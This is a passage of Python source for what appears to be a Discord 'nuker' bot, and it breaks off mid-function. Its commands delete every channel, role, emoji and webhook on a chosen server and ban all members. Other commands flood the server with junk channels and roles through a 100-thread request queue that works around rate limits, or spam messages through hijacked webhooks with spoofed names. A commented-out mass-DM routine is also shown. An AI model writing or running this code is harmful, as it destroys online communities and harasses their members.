# if len(server_members) > 1:
# temp = []
# temp.append(server_members[0])
# for member_ in server_members:
# for i in temp:
# temp.append(member_)
# server_members = temp
@commands.check(checkPerm)
@client.command(name='bans')
async def bans(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Bans', [s.user for s in await selected_server.bans()])
@commands.check(checkPerm)
@client.command(name='connect', aliases=['con'])
async def connect(ctx, *, server=None):
if server is None and ctx.guild is None:
await log(ctx, f'Providing a server name is required.')
return
if server is None and not isDM(ctx):
server = ctx.guild
else:
temp_name = server
server = containing(client.guilds, server)
if server is None:
await log(ctx, f'Unable to find {temp_name} server.')
return
global selected_server
selected_server = server
await log(ctx, f'Successfully connected to `{server.name}`.')
######### Unities ##########
@commands.check(checkPerm)
@client.command(name='addChannel', aliases=['aCh', 'aChannel'])
async def addChannel(ctx, channel_name, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_text_channel(channel_name, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added channel `{channel_name}` to category `{category}`.')
except:
await log(ctx, f'Unable to add channel `{channel_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addVoiceChannel', aliases=['aVoiceChannel', 'aVC'])
async def addVoiceChannel(ctx, voice_channel, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_voice_channel(voice_channel, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added VC `{voice_channel}` to category `{category}`.')
except:
await log(ctx, f'Unable to add VC `{voice_channel}`.')
raise
@commands.check(checkPerm)
@client.command(name='addEmoji', aliases=['aEmoji', 'aEm'])
async def addEmoji(ctx, item, *, name=None, bits=None):
if not await hasTarget(ctx):
return
if bits is None:
# Raw IPv4 and IPv6 are not supported
if item.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
if name is None:
await log(ctx, 'Name for emoji? I\'m not always going to name it for you...')
return
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(item).content).read())
await log(ctx, f'Successfully added emoji `{name}`.')
except:
raise
elif item[0] == '<': # EX: <a:triggeredd:627060014431076352>
item = item.split(':')
if name is None:
name = item[1]
try:
if item[0] == '<a': # Animated
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.gif?v=1').content).read())
else:
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.png?v=1').content).read())
await log(ctx, f'Successfully added emoji: {name}')
except:
raise
elif os.path.isfile(item): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(item, 'rb') as data:
await selected_server.create_custom_emoji(name=(name), image=data.read())
await log(ctx, f'Successfully added emoji: {name}')
else:
await log(ctx, 'Bad path to image.')
else:
selected_server.create_custom_emoji(name=(name), image=bits)
@commands.check(checkPerm)
@client.command(name='addCategory', aliases=['aCat', 'aCa'])
async def addCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
try:
await selected_server.create_category(category_name)
await log(ctx, f'Successfully created category `{category_name}`.')
except:
await log(ctx, f'Unable to create category `{category_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addRole', aliases=['aRole', 'aR'])
async def addRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
perms = name.pop(-1)
await selected_server.create_role(name=' '.join(name), permissions=discord.Permissions(permissions=int(perms)))
await log(ctx, f'Successfully added role `{name}` with permission `{perms}`.')
except:
await log(ctx, f'Failed to add role `{name}`.')
raise
@commands.check(checkPerm)
@client.command(name='moveRole', aliases=['mRole', 'mR'])
async def moveRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
position = name.pop(-1)
name = ' '.join(name)
if len(name) == 0 or not position.isdigit():
await log(ctx, 'Invalid inputs.')
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find role `{name}`.')
await role.edit(position=int(position))
await log(ctx, f'Successfully moved role {role.name} to position `{str(position)}`.')
except:
await log(ctx, f'Unable to move role `{name}` to position `{position}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteRole', aliases=['dRole', 'dR'])
async def deleteRole(ctx, *, name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find `{name}`.')
try:
await role.delete()
await log(ctx, f'Successfully removed role `{role.name}`')
except:
await log(ctx, f'Unable to delete role `{role.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteChannel', aliases=['dChannel', 'dCh'])
async def deleteChannel(ctx, channel_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.text_channels, channel_name)
if channel is None:
await log(ctx, f'Unable to find text channel `{channel_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteVoiceChannel', aliases=['dVC', 'dVoiceChannel'])
async def deleteVoiceChannel(ctx, VC_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.voice_channels, VC_name)
if channel is None:
await log(ctx, f'Unable to find voice channel `{VC_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Voice channel `{channel.name}` is deleted.')
except:
consoleLog(f'Unable to delete voice channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCategory', aliases=['dCat', 'dCategory'])
async def deleteCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.categories, category_name)
if channel is None:
await log(ctx, f'Unable to find category `{category_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Category `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete category `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCC', aliases=['dCC'])
async def deleteCC(ctx, *, name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.channels, name)
if channel is None:
await log(ctx, f'Unable to find channel `{name}`.')
return
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is removed from `{selected_server.name}`.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteEmoji', aliases=['dEm'])
async def deleteEmoji(ctx, *, name):
emoji = containing(selected_server.emojis, name)
if emoji is None:
await log(ctx, f'Unable to find channel `{name}`.')
try:
await emoji.delete(reason=None)
await (ctx, f'Emoji `{emoji.name}` is removed from the server.')
except:
await log(ctx, f'Unable to delete emoji: `{emoji.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='ban')
async def ban(ctx, member_:discord.Member):
if not await hasTarget(ctx):
return
try:
await member_.ban()
await log(ctx, f'Successfully banned `{member_.name}#{member_.discriminator}`.')
except:
await log(ctx, f'Unable to ban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='unban')
async def unban(ctx, *, name):
if not await hasTarget(ctx):
return
member_ = containing([s.user for s in await selected_server.bans()], nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find user `{name}` in server `{selected_server.name}`.')
return
try:
await selected_server.unban(member_)
await log(ctx, f'`{member_.name}#{member_.discriminator}` is now free :).')
except:
await log(ctx, f'Failed to unban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='roleTo')
async def roleTo(ctx, member_name, *, role_name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, nameIdHandler(role_name))
if role is None:
await log(ctx, f'Unable to find role `{role_name}`.')
return
# discord.utils.get is useless don't use it it's way slower than "containing"
member_ = containing(selected_server.members, nameIdHandler(member_name))
if member_ is None:
await log(ctx, f'Unable to find user `{member_name}`.')
return
if role in member_.roles:
try:
await member_.remove_roles(role)
await log(ctx, f'Successfully removed role `{role.name}` from user `{member_.name}`.')
except:
await log(ctx, f'Unable to remove role `{role.name}` from user `{member_.name}`.')
raise
else:
try:
await member_.add_roles(role)
await log(ctx, f'Successfully given role `{role.name}` to user `{member_.name}`.')
except:
await log(ctx, f'Unable to add role `{role.name}` to user `{member_.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='disableCommunityMode', aliases=['dCM', 'dCommunityMode'])
async def disableCommunityMode(ctx):
if not await hasTarget(ctx):
return
try:
await log(ctx, f'{Fore.YELLOW}Disabling community mode')
r = requests.patch(f'https://discord.com/api/v8/guilds/{selected_server.id}', headers=headers, json=
{'description': None, 'features': {'0': 'NEWS'},
'preferred_locale': 'en-US',
'public_updates_channel_id': None, 'rules_channel_id': None})
consoleLog(f'Disabling community mode response -> {r.text}', True)
await log(ctx, f'{Fore.GREEN}Disabled community mode.')
except Exception as e:
consoleLog(f'{Fore.RED}Error while attempting to disable community mode, {e}', True)
raise
@commands.check(checkPerm)
@client.command(name='grantAllPerm', aliases=['gap'])
async def grantAllPerm(ctx):
global grant_all_permissions
if grant_all_permissions:
await log(ctx, 'Now only people with permissions can use the commands.')
grant_all_permissions = False
else:
await log(ctx, 'Now everyone can use the bot commands')
grant_all_permissions = True
######### Bombs #########
@commands.check(checkPerm)
@client.command(name='kaboom')
async def kaboom(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or int(n) < 0:
await log(ctx, 'Please enter a positive integer.')
return
await log(ctx, f'A series of bombs have been dropped onto `{selected_server.name}`.')
tasks = [channelBomb(ctx, n, method), categoryBomb(ctx, n, method), roleBomb(ctx, n, method)]
await asyncio.gather(*tasks)
concurrent = 100
q = Queue(concurrent * 2)
def requestMaker():
while True:
requesting, url, headers, payload = q.get()
try:
# proxy = randomProxy('https')
# r = requesting(url, data=json.dumps(payload), headers=headers, proxies=proxy, timeout=timeout)
r = requesting(url, data=json.dumps(payload), headers=headers, timeout=timeout)
if r.status_code == 429:
r = r.json()
if want_log_request:
if isinstance(r['retry_after'], int): # Discord will return all integer time if the retry after is less then 10 seconds which is in miliseconds.
r['retry_after'] /= 1000
if r['retry_after'] > 5:
consoleLog(f'Rate limiting has been reached, and this request has been cancelled due to retry-after time is greater than 5 seconds: Wait {str(r["retry_after"])} more seconds.')
q.task_done()
continue
consoleLog(f'Rate limiting has been reached: Wait {str(r["retry_after"])} more seconds.')
q.put((requesting, url, headers, payload))
elif want_log_request and 'code' in r:
consoleLog('Request cancelled due to -> ' + r['message'])
except json.decoder.JSONDecodeError:
pass
# except requests.exceptions.ProxyError:
# consoleLog(f'Proxy "{proxy}" did not respond to a request. Trying...')
# q.put((requesting, url, headers, payload))
except requests.exceptions.ConnectTimeout:
consoleLog(f'Reached maximum load time: timeout is {timeout} seconds long {proxy}')
q.put((requesting, url, headers, payload))
except Exception as e:
consoleLog(f'Unexpected error: {str(e)}')
q.task_done()
for i in range(concurrent):
Thread(target=requestMaker, daemon=True).start()
@commands.check(checkPerm)
@client.command(name='channelBomb')
async def channelBomb(ctx, n, method='fixed'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 0,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done text channel bombing.', True)
@commands.check(checkPerm)
@client.command(name='categoryBomb')
async def categoryBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 4,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done category bombing.', True)
@commands.check(checkPerm)
@client.command(name='roleBomb')
async def roleBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Role bombing has started.', True)
for i in range(n):
payload = {
'name': method()
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, payload))
q.join()
consoleLog('Done role bombing.', True)
# @commands.check(checkPerm)
# @client.command(name='massDM', aliases=['md'])
# async def massDM(ctx, command, *, args=None):
# if len(server_members) == 0:
# await log(ctx, 'You don\'t have anything anyone to dm with :(. Fetch some members.')
# return
# if args is not None:
# args = args.split()
# if command == 'channels' or command == 'channel':
# if args is None:
# args = []
# args.append('1')
# members_ = []
# for i in range(len(server_members)):
# if members_[i].channel_id is not None:
# members_[i].id = members_[i].channel_id
# await embed(ctx, args[0], 'MassDM targets', members_)
# elif command == 'load':
# for member_ in server_members:
# print(member_.name)
# if int(member_.id) == client.user.id:
# continue
# # asdf = requests.post('https://discordapp.com/api/v8/users/@me/channels', headers=headers, json={'recipient_id': member_.id}, proxies=randomProxy('https'), timeout=timeout).json()
# member_.__init__(member_.name, member_.id, member_.discriminator, client.get_user(member_.id).dm_channel.id)
# elif command == 'start':
# massDM_channels = [i.channel_id for i in server_members if i.channel_id is not None]
# if len(massDM_channels) == 0:
# await log(ctx, 'You don\'t have any DM loaded.')
# return
# for channel_id in massDM_channels:
# q.put((f'https://discordapp.com/api/v8/channels{channel_id}/messages', headers))
######### webhooks ##########
@commands.check(checkPerm)
@client.command(name='webhook', aliases=['webhooks', 'wh'])
async def webhook(ctx, *, args=None):
if not await hasTarget(ctx):
return
if args is None or args.isdigit(): # webhook list
if args is None:
args = '1'
try:
await embed(ctx, args, 'Webhooks', await selected_server.webhooks())
return
except:
raise
args = args.split()
if args[0] == 'create' or args[0] == 'add': # webhook create
# global headers
del args[0]
if len(args) < 1:
await log(ctx, f'More arguments is requested. You can put how many webhooks you want to create or channel id/name on the channels you want the webhooks to be created on.')
return
name = ' '.join(args)
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
channels = name.split()
if int(name) < 0:
await log(ctx, f'You thought a smol negative number will break this bot?')
return
if len(channels) == 1 and int(name) <= 50: ## probably will replace this with auto check channel id
channels = selected_server.text_channels
if int(name) > len(channels):
await log(ctx, f'This adding webhooks method can only distribute webhooks evenly and randomly throughout the text channels. You entered `{name}`, and there are only `{str(len(channels))}` text channel(s) in the server. If you don\'t what to add more text channels. You can use this command a few more times with a positive integer that is less than `{str(len(channels) + 1)}`.')
return
for i in range(int(name)):
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{channels.pop(randrange(len(channels))).id}/webhooks', headers, payload))
q.join()
await log(ctx, f'`{name}` webhooks has been created.')
elif len(channels) == 1 and int(name) < 100000000:
await log(ctx, f'The maximum webhooks that can be created every hour per server is 50. And you entered `{name}`.')
else:
for channel in channels:
checked_channel = containing(selected_server.text_channels, channel)
if checked_channel is None:
await log(ctx, f'Cannot find channel {channel}.')
continue
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{checked_channel.id}/webhooks', headers, payload))
elif args[0] == 'delete' or args[0] == 'remove':
name = args[1]
webhook = containing(await selected_server.webhooks(), name)
if webhook is None:
await log(ctx, f'Unable to find webhook `{name}`.')
return
requests.delete(f'https://discord.com/api/v8/webhooks/{webhook.id}', headers=headers)
await log(ctx, f'Webhook `{webhook.name}` is removed from the server.')
elif args[0] == 'attack':
global webhook_targets
args.pop(0) # Removing the attack keyword
try:
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
loaded_length = 0
if len(args) > 0 and args[0].lower() == 'all':
for webhook in webhooks:
webhook_targets.append(webhook)
loaded_length += 1
elif args[0] == 'start':
target_list_length = len(webhook_targets)
if target_list_length == 0:
await log(ctx, f'Looks like there really isn\'t any targets in the attack list. Maybe try: `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
return
_headers = {
'content-type': 'application/json'
}
if len(args) < 2:
args.append(10)
elif not args[1].isdigit():
await log(ctx, 'Please enter a positive integer.')
return
usernames_length = len(settings['webhook_spam']['usernames'])
contents_length = len(settings['webhook_spam']['contents'])
pfp_length = len(settings['webhook_spam']['pfp_urls'])
for i in range(int(args[1])):
payload = {
'username': choice(settings['webhook_spam']['usernames']),
'content': choice(settings['webhook_spam']['contents']),
'avatar_url': choice(settings['webhook_spam']['pfp_urls'])
}
q.put((requests.post, webhook_targets[randrange(target_list_length)].url, _headers, payload))
elif len(args) > 0 and args[0].isdigit() and int(args[0]) <= webhooks_length:
for i in range(int(args[0])):
webhook_targets.append(webhooks.pop(randrange(webhooks_length)))
webhooks_length -= 1
loaded_length += 1
elif args[0] == 'list':
if len(args) < 2:
args.append('1')
await embed(ctx, args[1], 'Targets on attacking list', webhook_targets)
elif args[0] == 'offload':
webhook_targets = []
await log(ctx, f'All webhooks have been offloaded')
else:
for webhook in args:
webhook = containing(await selected_server.webhooks(), webhook)
if webhook is None:
await log(ctx, f'Unable to find webhook `{webhook}`.')
continue
webhook_targets.append(webhook)
loaded_length += 1
if args[0] != 'list' and args[0] != 'start' and args[0] != 'offload':
await log(ctx, f'`{str(loaded_length)}` has been loaded into the target list.')
except:
raise
else:
await log(ctx, f'Unable to find `{args[0]}` command in webhook scripts.')
######### Nukes #########
@commands.check(checkPerm)
@client.command(name='nuke')
async def nuke(ctx):
if not await hasTarget(ctx):
return
await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
tasks = [deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
await asyncio.gather(*tasks)
if len(settings['after']) > 0:
if not isDM(ctx) and selected_server.id == ctx.guild.id:
ctx.message.channel = None
consoleLog(f'{Fore.BLUE}Running after commands...', True)
for command in settings['after']:
# Lol im so smart to think something like this would work
try:
ctx.message.content = settings['command_prefix'] + command
await client.process_commands(ctx.message)
except:
consoleLog(f'{Fore.RED}Command {Fore.YELLOW}"{settings["command_prefix"]}{command}" {Fore.RED}has failed to execute.', True)
pass
consoleLog(f'{Fore.GREEN}After commands completed.')
@commands.check(checkPerm)
@client.command(name='deleteAllRoles', aliases=['dar', 'dAllRoles'])
async def deleteAllRoles(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all roles...', True)
for role in selected_server.roles:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles/{role.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting roles.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllChannels', aliases=['dac', 'dAllChannels'])
async def deleteAllChannels(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all types of channels...', True)
for channel in selected_server.channels:
q.put((requests.delete, f'https://discord.com/api/v8/channels/{channel.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting channels.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllEmojis', aliases=['dae', 'dAllEmoji'])
async def deleteAllEmojis(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all emojis...', True)
for emote in selected_server.emojis:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/emojis/{emote.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting emojis.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllWebhooks', aliases=['daw', 'dAllWebhooks'])
async def deleteAllWebhooks(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all webhooks...', True)
for webhook in await selected_server.webhooks():
q.put((requests.delete, f'https://discord.com/api/v8/webhooks/{webhook.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting webhooks.', True)
@commands.check(checkPerm)
@client.command(name='banAll')
async def banAll(ctx):
if not await hasTarget(ctx):
return
payload = {'delete_message_days':'0', 'reason': ''}
consoleLog(f'{Fore.YELLOW}Starting ban all...', True)
for member_ in selected_server.members:
if f'{member_.name}#{member_.discriminator}' in settings['ban_whitelist'] or str(member_.id) in settings['ban_whitelist']:
consoleLog(f'Ban skipped for {member_.name}#{member_.discriminator} -> in ban whitelist')
continue
q.put((requests.put, f'https://discord.com/api/v8/guilds/{selected_server.id}/bans/{member_.id}', headers, payload))
q.join()
consoleLog(f'{Fore.GREEN}Ban all completed.', True)
## Configuration command ##
@commands.check(checkPerm)
@client.command(name='config')
async def config(ctx, command=None, *, args=None):
global settings, settings_copy
async def embed_list(n, title, array):
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item) > 17:
item = item[:17] + '...'
names += f'{str(i+1)}) {item}\n'
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Items', value=names, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}\n' +
('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
if command is None:
status_list = []
features_list = []
temp = settings.copy()
features_list.append('bomb_messages')
if temp['bomb_messages']['random'] is None or len(temp['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('webhook_spam')
if len(temp['webhook_spam']['usernames']) == 0 or len(temp['webhook_spam']['pfp_urls']) == 0 or len(temp['webhook_spam']['contents']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
del temp['bomb_messages']
del temp['webhook_spam']
for feature in temp:
features_list.append(feature)
if settings[feature] is None or (type(settings[feature]).__name__ == 'list' and len(settings[feature]) == 0):
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Nuking features',
description = f':white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'Use `{settings["command_prefix"]}config <feature>` to get more information about how to config that feature.\n\n`{settings["command_prefix"]}config save <file name>` to save the current config. If you save the config as `default.json` the bot next time will directly start with whatever is in that `.json` file.', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
return
command = command.lower()
#################
# permissions #
#################
if command == 'permissions' or command == 'permission' or command == 'perms' or command == 'perm':
if args is None:
status_list = []
features_list = []
features_list.append('permissions')
if len(settings['permissions']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Permissions list',
description = f'Permissions for using the bot are given to the users.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`permissions add <userTag or userID> [userTag or userID] [user...` - grant permissions to the given user(s)\n\n`permissions remove <line number> [line number] [line...` - remove line(s) from the list\n\n`permissions list [page number]` - list all users that are in the permission list', inline=False)
embed.set_footer(text=('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
else:
args = args.split()
def alreadyExisted(checkingID):
for userID_index in range(len(settings['permissions'])):
if settings['permissions'][userID_index] == checkingID:
return True, userID_index
return False, None
if args[0] == 'add':
del args[0]
for userID in args:
existed, checkedID_index = alreadyExisted(userID)
if existed:
await log(ctx, f'Failed to add `{settings["permissions"][checkedID_index]}`. Already existed the permission list.')
continue
else:
settings['permissions'].append(userID)
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['permissions'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['permissions'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'permission list', settings['permissions'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
#################
# bomb_messages #
#################
elif command == 'bomb_messages' or command == 'bomb_message' or command == 'bomb':
if args is None:
status_list = []
features_list = []
features_list.append('random')
if settings['bomb_messages']['random'] is None:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('fixed')
if len(settings['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bomb_messages',
description = f'Config for all the bomb commands.\nWhen you run bomb commands like `{settings["command_prefix"]}channelbomb 100 fixed` the fixed is the type of word list you are going to use. In this case the word list is going to randomly pick texts from the "fixed" list.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`bomb_messages fixed add <command>` - add contents to the back of the list\n\n`bomb_messages fixed remove <line number> [line number] [line...` - remove line(s) from the list\n\n`bomb_messages fixed list [page number]` - list contents that are in the content list\n\n`bomb_messages random <character length>` - sets character length for bomb commands like `{settings["command_prefix"]}kaboom 100 b64`(b64 = base64) ', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0].lower() == 'random':
if len(args) > 1 and args[1].isdigit() and (1 <= (length := int(args[1])) <= 1024):
settings['bomb_messages']['random'] = length
await log(ctx, f'Random-message length has been set to `{str(length)}`.')
else:
await log(ctx, 'Please enter a positive integer that is between 1 and 1024.')
elif args[0].lower() == 'fixed':
if args[1] == 'add':
if len(args) > 2 and (1 <= len(text := ' '.join(args[2:])) <= 100):
settings['bomb_messages']['fixed'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 100 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['bomb_messages']['fixed'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['bomb_messages']['fixed'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'bomb_messages fixed list', settings['bomb_messages']['fixed'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unable to find {args[0]} config.')
################
# webhook #
################
elif command == 'webhook_spam':
if args is None:
status_list = []
features_list = []
for feature in settings['webhook_spam']:
features_list.append(feature)
if len(settings['webhook_spam'][feature]) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'webhook_spam',
description = f'Using webhook to spam messages. To send a message from discord webhook it requires 3 items: usernames, profile picture, and contents. For profile picture you can only put an image URL or put `none` for no pfp.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`webhook_spam <type> add <command>` - add contents to the back of the list\n\n`webhook_spam <type> remove <line number> [line number] [line...` - remove line(s) from the list\n\n`webhook_spam <type> list [page number]` - list contents that are in the content list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'usernames' or args[0] == 'username':
if args[1] == 'add':
if len(args) > 2 and (0 < len(text := ' '.join(args[2:])) <= 32):
settings['webhook_spam']['usernames'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 32 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['usernames'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['usernames'][item - offset]
offset += 1
else:
